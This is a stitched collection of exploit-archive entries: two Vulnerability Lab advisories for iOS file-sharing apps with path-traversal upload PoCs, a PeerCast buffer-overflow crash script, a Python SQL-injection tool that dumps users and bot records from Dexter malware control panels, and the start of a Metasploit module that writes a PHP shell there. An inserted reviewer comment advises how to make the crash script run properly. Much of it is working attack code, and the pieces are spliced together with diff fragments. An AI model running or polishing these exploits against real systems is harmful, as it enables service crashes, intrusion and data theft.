http://www.vulnerability-lab.com/get_content.php?id=1198
Release Date:
=============
2014-02-14
Vulnerability Laboratory ID (VL-ID):
====================================
1198
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
mbDriveHD - Turn your iPad into a wireless network disk and document viewer. With mbDriveHD, transferring files to and
from your iPad has never been easier! Thanks to our lightning fast Web server build-in, you can use any web browser to
transfer your documents and files to/from iPad. This app has a 2.7 star rating, with ratings in 27 markets (36 ratings).
It occupies the 165441th position in our ranking with 52 points. It is among the 25% best ones of its category and among
the 25% best ones of the overall top.
( Copy of the Homepage: https://itunes.apple.com/us/app/mbdrivehd./id384867710 - Commercial $2.99 )
( Copy of the Homepage: https://itunes.apple.com/de/app/mbdrivehd-free/id399732602 - Free Edition )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official mbDriveHD v1.0.7 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-02-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
mbpowertools
Product: mbDriveHD - iOS Mobile Web Application 1.0.7
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the web-application/device.
The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are
able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file index section after the POST method request. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Directory Listing
1.2
A local command/path injection web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application.
The remote vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile application.
The vulnerability is located in the in the `device name` value of the `index and sub category listing` module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
with a cvss (common vulnerability scoring system) count of 6.0(+)|(-)6.1.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index File Directory Listing - [Header]
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: Upload > [filename]
<p><a href="..">..</a><br>
<table width="750"><tbody>
<tr>
<td width="500"><a href="><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">><><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">.jpg</a></td>
<td align="right" width="140" > 23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:49:43 +0000</td>
</tr><tr>
<td width="500" ><a href="><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg">><%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg</a></td>
<td align="right" width="140" > 23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:32:23 +0000</td>
</tr></tbody></table>
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file:<input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /></label></form>
</body></html></iframe></a></td></tr></tbody></table></p>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[1228] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.109:8080/]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------27573282698270
Content-Disposition: form-data; name="file"; filename="<%2F./[LOCAL FILE INCLUDE VULNERABILITY!].jpg"
Content-Type: image/jpeg
1.2
The local command inject web vulnerability can be exploited by remote attackers with physical device access and without
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the mobile web application and start it
2. Open your device settings info menu and change the `device name` to your own command/path string combined with script code
3. Save the device name and open the software
4. Activate the wifi interface port 8080
PoC: Device Name - Command Inject Vulnerability
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Files from bkm337?</title><style>html {background-color:#eeeeee} body
{ background-color:#FFFFFF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x;
margin-left:15%; margin-right:15%; border:3px groove #006600; padding:15px; } </style></head>
<body><h1>Files from bkm337?[LOCAL COMMAND INJECT VIA DEVICE NAME VALUE!]</h1><bq>The following files are hosted live
from the iPad's Docs folder.</bq><p><a href="..">..</a><br><table width="750"><tbody><tr>
<td width="500"><a href="37.jpg">37.jpg</a></td>
<td align="right" width="140">23.8 Kb</td><td width="10"></td><td width="300">2014-02-12 13:32:23 +0000</td>
</tr></tbody></table>
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1">
<label>upload file:<input name="file" id="file" type="file"></label><label>
<input name="button" id="button" value="Submit" type="submit"></label></form></body></html>
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure parse of the filename value in the vulnerable upload POST method request.
Ensure also the output name and data information context is secure encoded to prevent persistent injects or command executions.
1.2
The local command inject web vulnerability can be patched by a secure encode of the vulnerable device name value in the header location of the web-interface.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as high(+).
1.2
the security risk of the local command inject web vulnerability is estimated as medium(+)|(-)high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


@ -0,0 +1,323 @@
Document Title:
===============
File Hub v1.9.1 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1195
Release Date:
=============
2014-02-15
Vulnerability Laboratory ID (VL-ID):
====================================
1195
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
File Hub is a powerful and intuitive file manager for iOS. Read, Play, View many file formats, easily transfer files
between computer or cloud services and manage files via browser on computer. Voice recorder, text file editor and more.
(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/file-hub-usb+wifi+bluetooth+cloud/id520299954 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical web vulnerabilities in the official File Hub v1.9.1 iOS application.
Vulnerability Disclosure Timeline:
==================================
2014-02-15: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: File Hub - Mobile Web Application 1.9.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A critical remote code execution web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application.
The web vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service.
The vulnerability is located in the `folder rename via edit` and `new folder` function of the file hub wifi application interface. Remote attackers
are able to inject own system specific codes as folder/path name to compromise the application. The code execution occurs after the inject via POST
method in the main index and the sub category folder. In the sub category folder the code executes in the header location of the application context.
In the main index the code execution occurs in the index file dir & item list. The security risk of the remote code execution vulnerability in the
new folder function is estimated as critical with a cvss (common vulnerability scoring system) count of 9.3(+)|(-)9.4.
Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password.
Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] New Folder (Add)
Vulnerable Parameter(s):
[+] folder name
Affected Module(s):
[+] Index File Dir Item List - Path Dir Location on Top
[+] Sub Category - Header Location to Path
1.2
A local file include web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the web-application or mobile device.
The web vulnerability is located in the `file name` value of the `Files to Upload` module POST method request. Remote attackers are
able to inject own files with malicious filename to compromise the mobile application. The attack vector is persistent and the request
method is POST. The local file/path include execution occcurs in the main file to path section after the refresh of the file upload.
The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring
system) count of 7.3(+)|(-)7.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized
local file include web attacks.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Files to Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Item List
[+] Sub Category File Dir Item List
[+] Index File or Item Edit
[+] Index File or Item Remove/Delete
Proof of Concept (PoC):
=======================
1.1
The remote code execution web vulnerability can be exploited by remote attackers without user interaction and privileged application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC:
<table class="jtable"><thead><tr><th style="width: 1%;" class="jtable-command-column-header jtable-column-header-selecting">
<div class="jtable-column-header-container"><input type="checkbox"></div></th><th style="width: 12.1164%;" class="jtable-column-header">
<div class="jtable-column-header-container"><span class="jtable-column-header-text"></span><div class="jtable-column-resize-handler"></div></div></th>
<th style="width: 48.5344%;" class="jtable-column-header"><div class="jtable-column-header-container">
<span class="jtable-column-header-text">File Name</span><div class="jtable-column-resize-handler"></div></div></th>
<th style="width: 12.1164%;" class="jtable-column-header"><div class="jtable-column-header-container"><span class="jtable-column-header-text">File Size</span>
<div class="jtable-column-resize-handler"></div></div></th><th style="width: 19.4138%;" class="jtable-column-header"><div class="jtable-column-header-container">
<span class="jtable-column-header-text">Last modified</span><div class="jtable-column-resize-handler"></div></div></th><th style="width: 4.81902%;"
class="jtable-column-header"><div class="jtable-column-header-container"><span class="jtable-column-header-text"></span></div></th><th style="width: 1%;"
class="jtable-command-column-header"></th><th style="width: 1%;" class="jtable-command-column-header"></th></tr></thead><tbody><tr data-record-key="/BKM-Filter-Bypass-0ne"
class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png" height="32px"
width="32px"></td><td><a style="cursor: pointer;" href="http://localhost:8080/">BKM-Filter-Bypass-0ne</a></td><td>N/A</td><td>11.02.14 20:01</td><td></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete"><span>Delete</span></button></td></tr>
<tr data-record-key="/test23" class="jtable-data-row"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png"
height="32px" width="32px"></td><td><a style="cursor: pointer;" href="http://localhost:8080/">test23</a></td><td>N/A</td><td>11.02.14 20:01</td><td></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete"><span>Delete</span></button></td></tr>
<tr data-record-key="/test337+">[REMOTE CODE EXECUTION VULNERABILITY!]>" class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column">
<input type="checkbox"></td><td><img src="File%20Hub_1-Dateien/folder.png" height="32px" width="32px"></td>
<td><a style="cursor: pointer;" href="http://localhost:8080/">test337 "><[REMOTE CODE EXECUTION VULNERABILITY!]"></a></iframe></a></td><td>N/A</td>
<td>11.02.14 20:01</td><td></td><td class="jtable-command-column"><button class="jtable-command-button jtable-edit-command-button" title="Rename file">
<span>Rename file</span></button></td><td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete">
<span>Delete</span></button></td></tr></tbody></table>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/rename.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Gr??e des Inhalts[171] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/]
Content-Length[61]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
FileId[%2Ftest337[REMOTE CODE EXECUTION VALUE!]]
Name[localhost]
Response Header:
Accept-Ranges[bytes]
Content-Length[171]
Date[Tue, 11 Feb 2014 19:02:54 GMT]
Status: 200[OK]
GET http://localhost:8080/[REMOTE CODE EXECUTION VALUE!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[337]
Date[Tue, 11 Feb 2014 19:02:54 GMT]
1.2
The local file include web vulnerability can be exploited by remote attackers without privileged web application user account and also
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC:
<th style="width: 1%;" class="jtable-command-column-header"></th><th style="width: 1%;"
class="jtable-command-column-header"></th></tr></thead><tbody><tr data-record-key="/asdads/8f11a581d505d476cebd607056e4c167621c2e61.jpg"
class="jtable-data-row jtable-row-even"><td class="jtable-selecting-column"><input type="checkbox"></td><td>
<img src="File%20Hub_3-Dateien/jpg.png" height="32px" width="32px"></td><td><a style="cursor: pointer;"
href="http://localhost:8080/">%20>"\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg</a></td><td>24 Kb</td><td>11.02.14 20:30</td><td>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/upload.php Load Flags[LOAD_BYPASS_CACHE ]
Gr??e des Inhalts[16]
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Cache-Control[no-cache]
Referer[http://192.168.2.109:8080/]
Content-Length[25068]
Content-Type[multipart/form-data; boundary=---------------------------13158193021484]
Cookie[jtable%2376270709page-size=10]
Connection[keep-alive]
Pragma[no-cache]
POST-Daten:
POST_DATA[-----------------------------13158193021484
Content-Disposition: form-data; name="uploader"
fineuploader
-----------------------------13158193021484
Content-Disposition: form-data; name="dirpath"
/test23
-----------------------------13158193021484
Content-Disposition: form-data; name="qquuid"
ed6448c1-abb5-4df8-9216-2adb17900f55
-----------------------------13158193021484
Content-Disposition: form-data; name="qqtotalfilesize"
24386
-----------------------------13158193021484
Content-Disposition: form-data; name="qqfile"; filename="\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg"
Content-Type: image/jpeg
????
PoC: Button Error in Menu - qqfile > filename (Edit & Delete)
<button class="jtable-command-button jtable-edit-command-button" title="Rename file"><span>Rename file</span></button></td>
<td class="jtable-command-column"><button class="jtable-command-button jtable-delete-command-button" title="Delete">
<span>Delete</span></button></td></tr><tr data-record-key="/test337 "><\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg"
class="jtable-data-row jtable-row-selected"><td class="jtable-selecting-column"><input type="checkbox"></td><td><img src="/webroot/images/fileicons/folder.png"
height="32px" width="32px"></td><td><a style="cursor: pointer;" href=".">test337 "><\\>../[LOCAL FILE INCLUDE VULNERABILITY VIA qqfile FILENAME!]/.jpg">
</a></a></td>
Solution - Fix & Patch:
=======================
1.1
The remote code execution vulnerability can be patched by a secure restriction and parse of the vulnerable rename and folder name values.
1.2
The local file include web vulnerability can be patched by a secure parse and encode of file names. Ensure also that the values in the index and
sub category item list are prepared with a secure validation to prevent file include or arbitrary file upload attacks.
Security Risk:
==============
1.1
The security risk of the remote code execution web vulnerability is estimated as critical.
1.2
The security risk of the local file include web vulnerability is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

29
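--- /dev/null
+++ b/platforms/linux/dos/31713.py
@@ -0,0 +1,29 @@
+source: http://www.securityfocus.com/bid/28986/info
+PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
+Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
+These issues affect PeerCast 0.1218; other versions may also be affected.
+#!/usr/bin/env python
+import sys, socket
+port = 7144
+buff = 'GET /http/ HTTP/1.1\n'
+buff+= 'Connection: close\n'
+buff+= 'Accept: */*\n'
+buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' + '\r\n'
+if(len(sys.argv) < 2):
+print "ERR: please specify a hostname"
+sys.exit(-1)
+try:
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((sys.argv[1], port))
+s.send(buff);
+except:
+print "ERR: socket()"
+sys.exit(-1)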
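Review bot: The file as committed will not parse — the four `source:`/description lines at the top are plain text rather than comments, and the `#!/usr/bin/env python` shebang sits on line 5 where the loader ignores it; prefix the preamble with `#` (or move it below the shebang as a module docstring) so the script is both runnable and self-documenting. The bare `except:` around the connect/send block also catches `SystemExit` and `KeyboardInterrupt` and discards the real error, so a DNS failure, a refused connection and a mistyped hostname all print the same `ERR: socket()`; narrowing it to `except socket.error as e:` and printing `e` keeps the diagnostic. The socket created at `s = socket.socket(...)` is never closed on either path; a `finally: s.close()` releases it.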


@ -0,0 +1,193 @@
# Exploit Title: Dexter (CasinoLoader) Panel SQLi
# Date: Feb, 13, 2014
# Exploit Author: Brian Wallace (@botnet_hunter)
# Version: CasinoLoader
# Tested on: Windows 7, Ubuntu, Debian
import pycurl
import urllib
import cStringIO
import base64
import argparse
import sys
import string
import pygeoip
version = "0.1-http_bots-PoC"
def PrintHelp():
global version
print "usage: dexter.PoC.py [-h] [action] [gateway url]"
print ""
print "Dexter CasinoLoader BAMF PoC v" + version
print "Exploiting CasinoLoader panels for information"
print "By Brian Wallace (@botnet_hunter)"
print ""
print "arguments:"
print " action Actions to be taken against the botnet (default: dump)"
print " dump - Print configuration information obtained from source file"
print " drop - Execute a command to make the bot scripts exit"
print " source Path to non-obfuscated source code for the target bot (default: stdin)"
print ""
print("GPS:")
print(" -m MaxMind Location Location of Maxmind database files (default .)")
print ""
print " -h, --help Print this message"
print ""
class DexterPanel:
def __init__(self, gateway_url):
self.gateway_url = gateway_url
@staticmethod
def _get_field(gateway, table, column, row):
buf = cStringIO.StringIO()
c = pycurl.Curl()
c.setopt(c.URL, gateway)
page = "' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + str(row) + " -- --"
params = urllib.urlencode({'val': 'AA==', 'page': base64.b64encode(page)})
c.setopt(c.POSTFIELDS, params)
c.setopt(c.HEADERFUNCTION, buf.write)
c.perform()
val = buf.getvalue()
cookie = None
for line in val.split('\n'):
line = line.strip()
if line.count('Set-Cookie:') > 0 and line.count("response") > 0:
cookie = line
cookie = cookie[cookie.find('=') + 1:]
cookie = urllib.unquote(cookie)
cookie = base64.b64decode(cookie)
cookie = cookie[1:]
cookie = cookie[:-2]
break
buf.close()
return cookie
def get_all_user_details(self):
count = 0
users = []
while True:
user = self._get_field(self.gateway_url, 'users', 'name', count)
if user is None or user == "":
break
password = self._get_field(self.gateway_url, 'users', 'password', count)
count += 1
users.append({'user': user, 'password': password})
return users
def get_all_bot_details(self):
count = 0
bots = []
while True:
user = self._get_field(self.gateway_url, 'bots', 'RemoteIP', count)
if user is None or user == "":
break
count += 1
bots.append({'RemoteIP': user,
'UID': self._get_field(self.gateway_url, 'bots', 'UID', count),
'Version': self._get_field(self.gateway_url, 'bots', 'Version', count),
'Username': self._get_field(self.gateway_url, 'bots', 'Username', count),
'Computername': self._get_field(self.gateway_url, 'bots', 'Computername', count),
'UserAgent': self._get_field(self.gateway_url, 'bots', 'UserAgent', count),
'OS': self._get_field(self.gateway_url, 'bots', 'OS', count),
'Architecture': self._get_field(self.gateway_url, 'bots', 'Architecture', count),
'Idle Time': self._get_field(self.gateway_url, 'bots', 'Idle Time', count),
'Process List': self._get_field(self.gateway_url, 'bots', 'Process List', count),
'LastVisit': self._get_field(self.gateway_url, 'bots', 'LastVisit', count),
'LastCommand': self._get_field(self.gateway_url, 'bots', 'LastCommand', count)})
return bots
if __name__ == "__main__":
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('action', nargs='?', type=str, default="dump", help="Actions to be taken against pBots (default: dump)", choices=["dump", "graph"])
parser.add_argument('gateway', nargs='?', type=str, default=None, help="URL to Dexter bot gateway")
parser.add_argument('-m', metavar='maxmind', type=str, nargs='?', default='./GeoLiteCity.dat')
parser.add_argument('-h', '--help', default=False, required=False, action='store_true')
args = parser.parse_args()
if args.help or args.gateway is None:
PrintHelp()
sys.exit()
if args.action == "dump":
url = args.gateway
dex = DexterPanel(url)
print "User details: %s" % dex.get_all_user_details()
print "Bot details: %s" % dex.get_all_bot_details()
elif args.action == "graph":
url = args.gateway
dex = DexterPanel(url)
bots = dex.get_all_bot_details()
#load Maxmind
sys.stderr.write('Loading MaxMind Database\n')
gi = pygeoip.GeoIP(args.m)
nodes = {}
connections = []
nodes["C2"] = {"id": 0, "label": "C2", "mod": 0}
highestnode = 1
#loop through all bots
for bot in bots:
ip = bot["RemoteIP"]
geoip = gi.record_by_addr(ip)
node = {"id": highestnode, "label": ip, "host": ip, "mod": 1}
highestnode += 1
if geoip is not None:
node['lat'] = geoip["latitude"]
node['lng'] = geoip["longitude"]
nodes[ip] = node
connections.append([node['id'], 0])
print('<?xml version="1.0" encoding="UTF-8"?>')
print('<gexf xmlns="http://www.gexf.net/1.2draft" version="1.2">')
print(' <meta lastmodifieddate="2009-03-20">')
print((' <creator>' + "bwall" + '</creator>'))
print(' <description></description>')
print(' </meta>')
print(' <graph mode="static" defaultedgetype="directed">')
print(' <attributes class="node" mode="static">')
print(' <attribute id="modularity_class" title="Modularity Class" type="integer"></attribute>')
print(' <attribute id="lat" title="lat" type="double"></attribute>')
print(' <attribute id="lng" title="lng" type="double"></attribute>')
print(' </attributes>')
print(' <nodes>')
for name, node in list(nodes.items()):
if 'lat' in node:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="' + str(node['lat']) + '"></attvalue>')
print(' <attvalue for="lng" value="' + str(node['lng']) + '"></attvalue>')
print(' </attvalues>')
print(' </node>')
else:
print((' <node id="' + str(node['id']) + '" label="' +
node['label'] + '">'))
print(' <attvalues>')
print((' <attvalue for="modularity_class" value="' +
str(node['mod']) + '"></attvalue>'))
print(' <attvalue for="lat" value="0"></attvalue>')
print(' <attvalue for="lng" value="0"></attvalue>')
print(' </attvalues>')
print(' </node>')
print(' </nodes>')
print(' <edges>')
count = 0
for node in connections:
print((' <edge id="' + str(count) + '" source="' + str(node[0]) +
'" target="' + str(node[1]) + '" />'))
count += 1
print(' </edges>')
print(' </graph>')
print('</gexf>')

172
platforms/php/remote/31695.rb Executable file

@ -0,0 +1,172 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Dexter (CasinoLoader) SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in the command and control panel
used to control Dexter (Point of Sale malware). This is done by accessing the
PHP page used by bots to report in (gateway.php) which does not sanitize input.
Input is encrypted and encoded, but the key is supplied by the bot connecting.
The 'page' parameter is used in this case. The command and control panel designates
a location to upload files, and can be used as a reliable location to write a
PHP shell. Authentication is not needed to exploit this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bwall (Brian Wallace) <bwallace[at]cylance.com>'
],
'References' =>
[
[
"URL", "http://www.xylibox.com/2013/08/point-of-sale-malware-infostealerdexter.html"
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['CasinoLoader gateway.php on Windows', {}],
['CasinoLoader gateway.php on Linux', {}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 08 2014"
))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the CasinoLoader root folder', '/']),
OptString.new('TARGETGATEWAY', [true, 'Name of bot gateway page', 'gateway.php']),
OptString.new('TARGETLOGIN', [true, 'Name of panel login page', 'index.php']),
OptString.new('TARGETUPLOAD', [true, 'Name of panel upload page', 'upload.php']),
OptString.new('TARGETDATABASEUSERTABLE', [true, 'Table in database that holds admin data', 'users'])
], self.class)
end
def gateway
return normalize_uri(target_uri.path, datastore['TARGETGATEWAY'])
end
def login
return normalize_uri(target_uri.path, datastore['TARGETLOGIN'])
end
def upload
return normalize_uri(target_uri.path, datastore['TARGETUPLOAD'])
